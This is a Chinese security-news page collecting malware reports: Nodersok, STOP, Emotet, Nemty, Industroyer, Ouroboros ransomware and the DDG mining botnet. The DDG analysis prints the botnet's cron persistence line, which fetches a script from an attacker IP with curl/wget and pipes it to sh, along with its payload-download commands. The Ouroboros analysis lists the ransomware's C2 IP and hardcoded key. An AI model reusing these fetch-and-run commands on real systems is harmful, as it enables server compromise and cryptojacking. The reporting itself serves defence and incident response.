分类: 恶意软件

微软发现新型 Nodersok 恶意软件已经感染了数千台个人电脑

微软发现全球数千台Windows电脑感染了一种新的恶意软件,该恶意软件下载并安装了node.js框架的副本,以将受感染的系统转换为代理,执行点击欺诈。该恶意软件被称为Nodersok或者Divergent,最初是在今年夏季发现的,通过恶意广告在用户电脑上强行下载HTA文件进行传播。 找到并运行这些HTA文件的用户,开始了一个涉及Excel,JavaScript和PowerShell脚本的多阶段感染过程,该过程最终下载并安装了Nodersok恶意软件。恶意软件本身具有多个组件,每个组件都有其自己的角色。有一个PowerShell模块试图禁用Windows Defender和Windows Update,还有一个组件将恶意软件权限提升到系统级别。 根据Microsoft和CISCO的报告,该恶意软件使用其中包含的2个合法应用在受感染的主机上启动SOCKS代理。但是,这里的报告分歧很大,微软声称,该恶意软件将受感染的主机转变为代理,以转发恶意流量。而思科则表示,这些代理用于执行点击欺诈。 为了防止感染,最好的建议是用户不要运行在电脑上找到的任何HTA文件,尤其是在不知道文件确切来源情况下。根据微软遥测技术,Nodersok过去几周已经成功感染了数千台电脑。Nodersok的棘手部分是使用了合法应用程序和内存有效负载,对于经典的基于签名的防病毒程序来说,它们非常难以检测Nodersok感染。   (稿源:cnBeta,封面源自网络。)

黑客创建虚假退伍军人招聘网站 用恶意软件感染受害者的电脑

据外媒CNET报道,思科Talos团队周二表示,一个黑客组织创建了一个假装帮助美国退伍军人寻找就业机会的虚假老兵招聘网站,并通过恶意软件感染受害者的电脑。Talos团队在博客文章中称,该网站名为hiringmilitaryheroes.com,要求用户下载一个伪造的安装应用程序,该应用程序部署了恶意软件和恶意间谍工具。 攻击者检索到的系统信息包括硬件、固件版本、补丁程序级别、处理器数量、网络配置、域控制器,屏幕大小和管理员名称。思科Talos团队称:“这是与机器有关的大量信息,使攻击者为进行其他攻击做好了充分的准备。”该团队认为,这有可能影响很多人。 “美国人很快就回馈和支持退伍军人……这个网站极有可能在社交媒体上获得关注,用户可以在社交媒体上分享链接,以期支持退伍军人。” 思科和赛门铁克表示,该黑客组织被称为Tortoiseshell,其最近攻击了沙特的IT供应商。 思科没有立即回应有关该网站是否仍在正常运行以及是否有人受到影响的置评请求。   (稿源:cnBeta,封面源自网络。)

当心 Google Alert 链接 可能涉及恶意软件和诈骗

黑客正在利用 Gogle Alert 的订阅功能向用户推送诈骗信息和恶意软件。   Google Alert 垃圾邮件 为了使恶意链接被 Google Alert 推送,黑客会创建含有热门词语的垃圾邮件页面,并将其纳入 Google 搜索索引。 黑客知道用户迫切希望使用解密器,所以他们伪造了诈骗网站,其中包含与特定解密器相关的关键字,使得关注该关键字的用户会收到他们伪造的网站链接。 我们可以在下面看到这些网页之一,他们假装讨论STOP DJvu Ransomware 的 Kaspersky 解密器,当用户直接导航到页面的URL 时,他们看到的就是下面的网页。 创建垃圾邮件界面以推销解密程序 当黑客创建这些页面并将其放入 Google 索引后,任何想要获得勒索软件,解密程序或 STOP 勒索软件通知的人都会被推送这个页面。 勒索软件解密器的推送 当用户通过 Google Alert 或 Google 搜索引擎点击该链接时,网页会被重定向到一个恶意网站。 重定向到虚假的“技术支持”界面 黑客并非只围绕技术来设计网页,还有例如电视,衣服,电影等主题。这些主题通常通过假日购物,优惠券,免费观看电影等方式吸引用户。 在上面的示例中,所有突出显示的链接都会重定向到诈骗网站。   消息来源:BleepingComputer, 译者:xyj,校审:吴烦恼 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

谷歌从其商店中删除了 2 个自拍相机应用程序 内含恶意广告软件

谷歌从其Play商店中删除了包含恶意广告软件的2款应用程序。两者都是自拍相机应用程序,下载量总计超过150万。之前,移动安全公司Wandera研究人员在Google商店中发现了这两个应用。第一款应用是Sun Pro Beauty Camera,下载量超过一百万次,第2款应用是Funny Sweet Beauty Selfie Camera,下载量超过50万次。 这些应用被发现提供侵入性的应用外广告,这不仅对用户造成烦恼,而且可能会损坏设备,耗尽电池,在某些情况下,还会感染恶意软件。移动安全公司Wandera研究人员表示,广告软件使作者能够从受影响的设备中获利,虽然这种情况通常被认为是滋扰而不是严重威胁,但这些特定的应用内建了比一般广告软件更先进的功能。 另外,这些应用还会请求不同寻常的权限,包括能够在无需用户确认情况下,随时录制音频,允许该应用在手机启动后激活,以及允许它们在另一个应用上显示内容。移动安全公司Wandera指出,这些应用功能类似于Google上个月删除的85个受广告软件感染的应用,它们显示了无法跳过,难以关闭的全屏广告。   (稿源:cnBeta,封面源自网络。)

STOP:过去 1 年最猖獗的勒索软件 通过破解软件肆意传播

你是否听说到STOP勒索软件?或许答案是否定的,毕竟目前没有太多关于该勒索软件的报道,也没有大多数安全研究人员涉及,而且它主要是通过破解软件、广告软件包和暗网等渠道进行感染传播的。 Ryuk,GandCrab和Sodinkibi等之所以能够受到媒体的广泛关注,是因为它们需要支付巨额的赎金,并能中止企业和地方政府的正常运转,而这些受影响的企业用户是防病毒公司赖以生存的重要服务对象。 基于Michael Gillespie的ID Ransomware提交报告,在过去1年中最活跃的勒索软件就是STOP软件。勒索软件识别服务ID Ransomware每天大约收到2500个勒索软件提交,其中,60-70%是STOP勒索软件提交。这种数量的提交超过了用户在寻求帮助时提交给服务的其他勒索软件。 为了分发STOP,勒索软件开发人员已经与黑幕站点和广告软件捆绑在一起。这些网站宣传一些破解的软件程序,不过实际内含广告程序,可在用户计算机上安装各种不需要的软件和恶意软件。通过这些捆绑软件安装的程序之一是STOP Ransomware。 目前已经发现STOP勒索软件的“破解软件”中,包括KMSPico,Cubase,Photoshop,甚至还有防病毒软件。不仅如此,这些网站还提供一些免费软件下载,同样内置安装勒索软件的广告软件捆绑包。更糟糕的是,其中一些变种还将Azorult密码窃取木马与勒索软件捆绑在一起,对受害者进行了双重攻击。 Stop勒索病毒还具有以下特性: 1.    加密时,禁用任务管理器、禁用Windows Defender、关闭Windows Defender的实时监控功能 ; 2.    通过修改hosts文件阻止系统访问全球范围内大量安全厂商的网站; 3.    因病毒执行加密时,会造成系统明显卡顿,为掩人耳目,病毒会弹出伪造的Windows 自动更新窗口;     (稿源:cnBeta,封面源自网络。)  

Emotet 木马卷土重来,不断演变

随着 Emotet 僵尸网络被重新唤醒,其传播方式,有效负载,恶意文档模板和电子邮件模板也在不断发展。 休止活动长达几个月之后,Emotet 在本周一卷土重来。它开始制造垃圾邮件,通过邮件将恶意附件推送给毫无戒心的用户。Emotet 原本是一种窃取银行登录凭据的木马,但它现在被用来分发其他恶意软件。 仅仅几天之后,Emotet 就被分成不同的版本,并采用了新的文档模板,旨在进一步诱骗用户使用恶意 Word 宏。   新的 Emotet 文档模板 Emotet 使用了恶意 Word 文档模板,要求用户通过单击“启用内容”按钮“接受许可协议”。这样做,将启用嵌入在文档中的宏,然后将 Emotet 木马安装在收件人的计算机上。 正如微软和 JamesWT,Joseph Roosen,Brad Duncan,ps66uk 所说,Emotet 已将其恶意文档模板更改为“受保护视图”诱饵。此诱饵告受害人“由于文件在受保护的视图中打开而无法完成操作。某些活动内容已被禁用。单击启用编辑并启用内容”。 与上一个模板一样,如果单击“ 启用编辑”,然后单击“ 启用内容”,嵌入的宏就会运行脚本,然后将Emotet安装到计算机上。   垃圾邮件中包含了恶意下载链接或附件 我们看到的大多数 Emotet 垃圾邮件都包含附件,但有些还包含了用于下载恶意文档的链接。 例如,下面的 Emotet 垃圾邮件就包含了一份恶意 Word 文档附件。 下图的垃圾邮件包含了一个链接,用于下载恶意文档。 这意味着如果要保障用户安全,单独过滤附件是不够的。   利用 WScript 和 PowerShell 安装 payloads 虽然大多数针对 Emotet 的报道都将关注点放在了产生 PowerShell 的恶意附件上,但一些垃圾邮件也会通过 WScript 执行 JScript 脚本来安装恶意负载。 例如,下面是一个 PowerShell 命令的示例,该命令由 Emotet 附件执行。 不幸的是,没有办法禁用 PowerShell 执行的编码命令。但是可以通过以下命令禁用 PowerShell 脚本: Set-ExecutionPolicy -ExecutionPolicy Restricted 凭借其拥有的多种有效载荷,潜在用户以及广泛的传播,Emotet 对于网络安全是一个很大的威胁,需要所有管理员,安全专业人员和用户的密切关注。     消息来源:BleepingComputer, 译者:r4938n,校审:吴烦恼 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

警惕:DDG 挖矿僵尸网络利用 SSH 弱口令爆破攻击 Linux 服务器

感谢腾讯御见威胁情报中心来稿! 原文:https://mp.weixin.qq.com/s/twR_Jh3aT8n7be3kbmyDhA   一、背景 腾讯安全专家在为某企业客户进行例行安全巡检过程中,发现客户部署的腾讯御界高级威胁检测系统出现了SSH服务失陷感知信息。在征得客户同意后对客户机器进行远程取证,并结合御界的关键日志进行分析,我们发现这是一起针对SSH服务器弱口令爆破攻击事件。由于发现及时,工程师及时协助客户进行隔离及杀毒,并未造成损失。 腾讯安全御见威胁情报中心对本次攻击事件展开调查,结果发现,这是由大型挖矿僵尸网络DDGMiner发起的攻击事件。DDGMiner是最早于2017年被发现的挖矿僵尸网络,其特点为扫描攻击 SSH服务、Redis 数据库和OrientDB数据库等服务器,并在攻陷的服务器上植入挖矿木马挖掘门罗币获利。从病毒服务器的目录中last modified字段可以看到,本次攻击中样本的更新时间为2019-08-29,目前为4004版本。 对样本进行分析后,发现与此前版本不同的是,样本中新增了针对Nexus Repository Manager漏洞、Supervisord漏洞的利用攻击代码,其攻击流程大致如下: 根据腾讯云鼎实验室监测数据,云上主机遭受来自最新版本DDGMiner的攻击流量从2019.08.29开始出现,在8月30日到达峰值,8月31日到9月1日下降到一定范围之后趋于平稳,大部分攻击流量被有效拦截。 而在少量失陷主机中,90%以上遭到SSH弱口令爆破入侵,由此可见DDGMiner的主要传播方式仍然为SSH爆破。腾讯安全提醒企业用户务必使用高强度的SSH、Redis登录密码,避免因设置不当而遭受攻击造成不必要的损失。 二、详细分析 黑客在通过弱口令爆破或漏洞攻击入侵后首先下载Shell脚本i.sh,并将其安装为crontab定时任务每15分钟执行一次。 mkdir -p /var/spool/cron/crontabsecho "" > /var/spool/cron/rootecho "*/15 * * * * (/usr/bin/nfosfa4||/usr/libexec/nfosfa4||/usr/local/bin/nfosfa4||/tmp/nfosfa4||curl -fsSL -m180 http://68.183.140.39/i.sh||wget -q -T180 -O- http://68.183.140.39/i.sh) | sh" >> /var/spool/cron/rootcp -f /var/spool/cron/root /var/spool/cron/crontabs/root 然后检测是否已经存在进程nfosfa4,若存在则杀死进程并删除对应的文件,然后从服务器下载ddgs.$(uname -m)保存为nfosfa4,其中uname –m用来获取系统类型并映射到文件名。最后通过chmod +x给nfosfa4赋予可执行权限,从而完成木马的下载更新。 ps auxf | grep -v grep | grep nfosfa4 || rm -rf nfosfa4if [ ! -f "nfosfa4" ]; then curl -fsSL -m1800 http://68.183.140.39/static/4004/ddgs.$(uname -m) -o nfosfa4||wget -q -T1800 http://68.183.140.39/static/4004/ddgs.$(uname -m) -O nfosfa4fichmod +x nfosfa4 接着查找并杀死多个历史版本的病毒进程,进程名分别为nfosbcb、nfosbcc、nfosbcd、nfosbce、nfosfa0、nfosfa1、nfosfa2。 ps auxf | grep -v grep | grep nfosbcb | awk '{print $2}' | xargs kill -9ps auxf | grep -v grep | grep nfosbcc | awk '{print $2}' | xargs kill -9ps auxf | grep -v grep | grep nfosbcd | awk '{print $2}' | xargs kill -9ps auxf | grep -v grep | grep nfosbce | awk '{print $2}' | xargs kill -9ps auxf | grep -v grep | grep nfosfa0 | awk '{print $2}' | xargs kill -9ps auxf | grep -v grep | grep nfosfa1 | awk '{print $2}' | xargs kill -9ps auxf | grep -v grep | grep nfosfa2 | awk '{print $2}' | xargs kill -9 然后启动病毒的最新版本nfosfa4,病毒被存放于以下四个目录之一。 /usr/bin/nfosfa4 /usr/libexec/nfosfa4 /usr/local/bin/nfosfa4 /tmp/nfosfa4 nfosfa4是采用golang语言开发,编译成基于Linux的ELF可执行文件,并且采用UPX加壳保护。golang语言是一款开源编程系统,其优点为简单可靠,支持夸平台编译等。golang语言非常适合服务器编程、分布式系统和数据库相关的网络编程,而DDGMiner恰好符合这些特点。 为了便于分析,我们通过Linux下的UPX脱壳工具进行脱壳,然后使用IDAGolangHelper脚本在IDA中对函数进行重命名。处理之后可以比较清晰的看到样本中漏洞攻击、挖矿、清除挖矿竞品等功能。 在还原后的函数中,可以看到针对SSH爆破、以及针对Redis服务器、Supervisord服务器、Nexus Repository Manager服务器的漏洞利用攻击代码。 样本还使用了hashicorp的go开源库memberlist来构建分布式网络,memberlist是用来管理分布式集群内节点发现、节点失效探测、节点列表的开源程序(github: https://github.com/hashicorp/memberlist)。样本初次到达受害机时,会获取本地节点的地址和状态信息,然后尝试连接到内置的ip列表中的远端节点从而加入远端的集群。 memberlist利用被称为“疫情传播算法”的Gossip协议在僵尸网络集群中同步数据。Gossip 过程由种子节点发起,当一个种子节点有状态需要更新到网络中的其他节点时,它就会随机的选择周围几个节点散播消息,收到消息的节点也会重复该过程,直至最终网络中所有的节点都收到了消息。病毒通过这个过程将某个节点上获得更新的挖矿木马和攻击脚本同步到所有节点。 最后,在挖矿功能部分,通过main_ptr_miner_Download函数下载,main_ptr_miner_Update更新,main_ptr_miner_CheckMd5校验矿机Md5值,以及通过main_ptr_miner_Run启动矿机,并且通过调用main_ptr_miner_killOtherMiner对其他挖矿木马进行清除。 三、安全建议 1、使用高强度的Redis登陆密码、SSH登陆密码, 必要时添加防火墙规则避免其他非信任来源ip访问。 2、及时修复Redis、Nexus Repository Manager、Supervisord服务相关的高危漏洞。 3、已中毒的linux服务器可采用以下手动清理方案。 a)、crontab如果如果包含以下内容,进行清理: "*/15 * * * * (/usr/bin/nfosfa4||/usr/libexec/nfosfa4||/usr/local/bin/nfosfa4||/tmp/nfosfa4||curl -fsSL -m180 http://68.183.140.39/i.sh||wget -q -T180 -O- http://68.183.140.39/i.sh) | sh" b)、/var/spool/cron/root文件,如果包含以下内容,进行清理: "*/15 * * * * (/usr/bin/nfosfa4||/usr/libexec/nfosfa4||/usr/local/bin/nfosfa4||/tmp/nfosfa4||curl -fsSL -m180 http://68.183.140.39/i.sh||wget -q -T180 -O- http://68.183.140.39/i.sh) | sh" c)、/var/spool/cron/crontabs/root文件,如果包含以下内容,进行清理: "*/15 * * * * (/usr/bin/nfosfa4||/usr/libexec/nfosfa4||/usr/local/bin/nfosfa4||/tmp/nfosfa4||curl -fsSL -m180 http://68.183.140.39/i.sh||wget -q -T180 -O- http://68.183.140.39/i.sh) | sh" d)、删除以下文件 /usr/bin/nfosfa4 /usr/libexec/nfosfa4 /usr/local/bin/nfosfa4 /tmp/nfosfa4 /usr/bin/betsbcc /usr/libexec/betsbcc /usr/local/bin/betsbcc /tmp/betsbcc /usr/bin/brhjbcc /usr/libexec/brhjbcc /usr/local/bin/brhjbcc /tmp/brhjbcc e)删除/tmp目录下文件 qW3xT, qW3xT.1, qW3xT.2, qW3xT.3, qW3xT.4, ddgs.3010, ddgs.3011, ddgs.3013, ddgs.3016, 2t3ik, 2t3ik.m, 2t3ik.p, 2t3ik.s, imWBR1, imWBR1.ig, wnTKYg, wnTKYg.noaes, fmt.3018 4、使用腾讯御界高级威胁检测系统检测未知黑客的各种可疑攻击行为。御界高级威胁检测系统,是基于腾讯反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统。 IOCs IP 68.183.140.39 URL hxxp://68.183.140.39:8000/static/4004/ddgs.x86_64 hxxp://68.183.140.39:8000/static/4004/ddgs.i686 hxxp://68.183.140.39:8000/i.sh MD5 bdfa1c43b3e03880d718609af3b9648f 76309d50ad8412954ca87355274bd8ff 4f0ef26b713d28469d08a8a833339e77 参考链接: https://blog.netlab.360.com/fast-analyze-ddg-v3021-and-v3022/

新研究暗示 2016 年乌克兰停电事件背后的潜在原因

据外媒报道,2016年12月,俄罗斯黑客在乌克兰国家电网运营商Ukrenergo的网络中植入了一种被称为Industroyer或Crash Override的恶意软件。而在圣诞节前两天的午夜,网络犯罪分子利用已经部署好的恶意软件破坏了乌克兰首都基辅附近一个传输站的所有断路器,从而导致首都大部分地区断电。 虽然这起网络攻击引发了一系列问题,但却没有给出明确的答案:首先,这次网络攻击的真正动机是什么?第二,为什么一个恶意软件能够如此强大,它可以瞬间让整个城市进入黑暗之中,而一个小时后工厂的工人只需要打开断路器就能修复? 对此,来自工业控制系统网络安全公司Dragos的研究人员近日发布了一篇论文,他们在文中重建了2016年乌克兰断电的时间线,希望能为寻找上述问题的答案获得一些启发。在这篇题为《CRASHOVERRIDE: Reassessing the 2016 Ukraine Electric Power Event as a Protection-Focused Attack》的文章中,研究团队梳理了恶意软件的代码并重新访问了Ukrenergo的网络日志。他们得出的结论是,有证据表明,黑客的意图是造成更大强度的物理破坏,如果没有几个月也会将停电时间延长到数周甚至可能危及到现场工厂工人的生命。如果是这样的话,那么攻击基辅电力供应的恶意软件将只是另外两种恶意代码–Stuxnet和Triton的其中一种,这两种曾分别攻击过伊朗和沙特阿拉伯。 然而问题的实质则在于细节。文章作者、Dragos分析师Joe Slowik表示:“虽然这最终是一个直接的破坏性事件,但部署的工具和使用它们的顺序强烈表明,攻击者想要做的不仅仅是把灯关掉几个小时。他们试图创造条件,对目标传输站造成物理破坏。” 更具体一点说,Joe和Dragos给出的理论暗示了黑客利用Crash Override发送自动脉冲来触发断路器进而利用由西门子生产的Siprotec保护继电器的一个已知漏洞。尽管在2015年发布了一个修复上述漏洞的安全补丁,但乌克兰的许多电网站并没有更新它们的系统,这就位黑客们打开了一扇门,他们只需要发出一个电脉冲就能让安全继电器在休眠状态下失效。 为了搞明白这点,Dragos搜索了Ukrenergo的日志并将它所发现的信息的原始线程联系起来。他们第一次重构了黑客的操作方式,具体如下:首先,黑客部署了Crash Override;然后他们用它来处罚基辅北部一个电网站的每一个断路器进而导致大规模停电;一个小时后,他们发射了一个雨刷组件从而使发射站的电脑无法工作并阻止了对发射站数字系统的监控;死后,黑客破坏了该电站的4个Siprotec保护继电器,从而使电站容易受到危险高频率电力的影响。 事实上,这一事件并没有持续到最后。虽然Dragos无法找到黑客计划失败的原因,但它怀疑黑客的某些网络配置错误或现场工作人员在发现正在休眠的Siprotec继电器时做出的快速反应可能是挽救局面的原因。   (稿源:cnBeta,封面源自网络。)

黑客通过伪造 PayPal 网站传播勒索软件

近期,有网站通过冒充 PayPal 官网,向不知情的用户传播 Nemty 勒索软件的新变种。 这个恶意软件的运营商正在尝试各种分发渠道,因为它被检测出是 RIG 漏洞利用工具包(EK)的有效载荷。   通过返现奖励引诱用户 当前最新的 Nemty 来自于该假冒 PayPal 网站,该网站承诺,将返还支付金额的 3-5% 给使用该网站进行支付操作的用户。   网友可以通过一些细节判断出此网站并非官网,该网站也被多家主流浏览器标记为危险,但用户还是有可能会继续下载和运行恶意软件“cashback.exe”。 安全研究人员 nao_sec  发现了新的 Nemty 分发渠道,并使用 AnyRun  测试环境来部署恶意软件并在受感染的系统上跟踪其活动。 自动分析显示,勒索软件加密受害主机上的文件大约需要7分钟。具体时间可能因系统而异。 幸运的是,该勒索软件可以被市场上最流行的防病毒产品检测到。对 VirusTotal 的扫描显示 68 个防病毒引擎中有 36 个检测到了该软件。   同形字攻击 因为网络犯罪分子使用的就是原网页的构造,所以该诈骗网站看起来就是官方网站。 为了增强欺骗性,网络犯罪分子还使用所谓的同形异义域名链接到了网站的各个部分(包括帮助和联系,费用,安全,应用和商店)。 骗子在域名中使用来自不同字母表的 Unicode 字符。浏览器会自动将它们转换为 Punycode  Unicode 中的内容看起来像 paypal.com,而在Punycode 中以 ‘xn--ayal-f6dc.com’ 的形式存在。 安全研究员 Vitali Kremez 指出这个 Nemty 勒索软件变种目前处于1.4版本,此版本修复了前版本中的一些小错误。 他观察到的一件事是“isRU” 检查已经被修改了,该检查可以验证受感染的计算机是否在俄罗斯,白俄罗斯,哈萨克斯坦,塔吉克斯坦或乌克兰。在最新版本中,如果检查结果为真,那么恶意软件不会随着文件加密功能而移动。   但是,这些国家/地区以外的计算机会被设为目标,他们的文件会被加密,副本也会被删除。 根据测试显示,黑客提出的赎金为 0.09981 BTC,约为 1,000美元,并且支付门户被匿名托管在了 Tor 网络上。 8月底,另一位安全研究员  Mol69 看到Nemty 通过RIG EK 进行分发,这样的做法十分反常,因为瞄准 Internet Explorer 和 Flash Player 这些不受欢迎的产品的攻击套件目前已经基本不存在了。   消息来源:BleepingComputer, 译者:r4938n,校审:吴烦恼 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

新勒索病毒 Ouroboros 来袭,多地医疗、电力系统受攻击

感谢腾讯御见威胁情报中心来稿! 原文: https://mp.weixin.qq.com/s/A3JYdC0dNze29v2W0xe1RA   一、概述 腾讯安全御见威胁情报中心通过蜜罐系统监测到Ouroboros勒索病毒在国内有部分传播,监测数据表明,已有湖北、山东等地的医疗、电力系统的电脑遭遇该勒索病毒攻击。经分析发现,该病毒的破坏仅在部分有限的情况可解密恢复,但在病毒按预期运行,基础设施完善情况下,暂无法解密。 Ouroboros勒索病毒首次出现于2019年8月中旬,目前发现其主要通过垃圾邮件渠道传播,由于其PDB路径中包含Ouroboros故因此得名,该病毒加密文件后会添加.Lazarus扩展后缀。 腾讯安全提醒各政企机构提高警惕,避免打开来历不明的邮件,腾讯电脑管家或腾讯御点终端安全管理系统可以查杀该病毒。 Ouroboros勒索病毒受害者的求助贴 Ouroboros勒索病毒的主要特点: 1.病毒会删除硬盘卷影副本; 2.部分样本会禁用任务管理器; 3.病毒加密前会结束若干个数据库软件的进程,加密文件时会避免加密Windows,eScan等文件夹; 4.个别情况下,该病毒的加密可以解密。在病毒按预期运行,基础设施完善情况下,暂无法解密; 5.攻击者弹出勒索消息,要求受害者通过电子邮件联系后完成交易。 二、分析 Ouroboros勒索病毒通常使用外壳程序来进行伪装,通过内存可Dump出勒索payload 查看勒索payload可知其PDB,根据PDB文件名,将该病毒命名为Ouroboros勒索病毒。 病毒运行后首先使用PowerShell命令行删除卷影 部分样本还会同时禁用任务管理器 首先获取本机的IP,磁盘信息,随机生成的文件加密Key信息,使用的邮箱信息进行上报 获取本机IP服务接口:hxxp://www.sfml-dev.org/ip-provider.php 病毒接收请求服务器IP:176.31.68.30   随后对服务器返回结果进行判断是否正常,当服务接口失活情况则拷贝一个硬编码密钥NC1uv734hfl8948hflgGcMaKLyWTx9H进行备用 加密前结束数据库相关进程列表: sqlserver.exe msftesql.exe sqlagent.exe sqlbrowser.exe sqlwriter.exe mysqld.exe mysqld-nt.exe mysqld-opt.exe 加密时避开以下关键词目录和文件: Windows eScan !Qhlogs Info.txt   硬编码的加密IV:1096644664328666 使用硬编码密钥KEY:NC1uv734hfl8948hflgGcMaKLyWTx9H进行AES文件加密   加密后如果为大文件则向后移动文件指针0xDBBA0处继续加密0x15F90字节大小内容   文件被加密为原始文件名.[ID=random][Mail=勒索邮箱号].Lazarus   例如如下图中“安装说明.txt”文件被加密为“安装说明.txt.[ID=40BjcX1Eb2][Mail=unlockme123@protonmail.com].Lazarus”   由于当前分析病毒版本接口未返回有效信息,病毒使用离线密钥进行加密,所以可以尝试对文件进行解密,编写测试demo可将上述“安装说明.txt”成功解密出原始内容。但由于在该病毒基础设施完善情况下,病毒攻击过程中使密钥获取困难,故该病毒的解密不容乐观。   病毒同时会留下名为Read-Me-Now.txt的勒索说明文档,要求联系指定邮箱购买解密工具     同时在ProgramData目录释放执行uiapp.exe弹出勒索说明窗口进一步提示勒索信息。   三、安全建议 企业用户: 针对该病毒的重点防御方案: 1.针对该勒索病毒主要通过电子邮件传播的特点,建议企业对员工加强安全意识教育,避免点击下载邮件附件。使用MS Office的用户,应尽量避免启用宏功能,除非该文档来源可靠可信。 2.使用腾讯御点终端安全管理系统或腾讯电脑管家拦截病毒,并启用文档守护者功能备份重要文档。 3.企业用户可以使用腾讯御界高级威胁检测系统,御界系统发现可疑邮件,并将可疑邮件的附件通过沙箱分析。在本案例中,御界系统的沙箱功能,分析出危险附件具有可疑的加密敲诈行为。 通用的安全措施: 1.企业内网可以关闭不必要的网络端口,降低黑客在内网攻击传播的成功率。如:445、135,139等,对3389,5900等端口可进行白名单配置,只允许白名单内的IP连接登陆。 2、尽量关闭不必要的文件共享,如有需要,请使用ACL和强密码保护来限制访问权限,禁用对共享文件夹的匿名访问。 3、采用高强度的密码,避免使用弱口令密码,并定期更换密码。建议服务器密码使用高强度且无规律密码,并且强制要求每个服务器使用不同密码管理。 4、对没有互联需求的服务器/工作站内部访问设置相应控制,避免可连外网服务器被攻击后作为跳板进一步攻击其他服务器。 5、对重要文件和数据(数据库等数据)进行定期非本地备份。 6、在终端/服务器部署专业安全防护软件,Web服务器可考虑部署在腾讯云等具备专业安全防护能力的云服务。   7、建议全网安装御点终端安全管理系统(https://s.tencent.com/product/yd/index.html)。御点终端安全管理系统具备终端杀毒统一管控、修复漏洞统一管控,以及策略管控等全方位的安全管理功能,可帮助企业管理者全面了解、管理企业内网安全状况、保护企业安全。 个人用户: 1、启用腾讯电脑管家,勿随意打开陌生邮件,关闭Office执行宏代码。 2、打开电脑管家的文档守护者功能,利用磁盘冗余空间自动备份数据文档,即使发生意外,数据也可有备无患。 IOCs MD5: 87283fcc4ac3fce09faccb75e945364c e17c681354771b875301fa30396b0835 感染信息上报IP: 176.31.68.30 勒索邮箱: Helpcrypt1@tutanota.com unlockme123@protonmail.com dadacrc@protonmail.ch Steven77xx@protonmail.com 离线情况AES密钥: KEY:NC1uv734hfl8948hflgGcMaKLyWTx9H IV:1096644664328666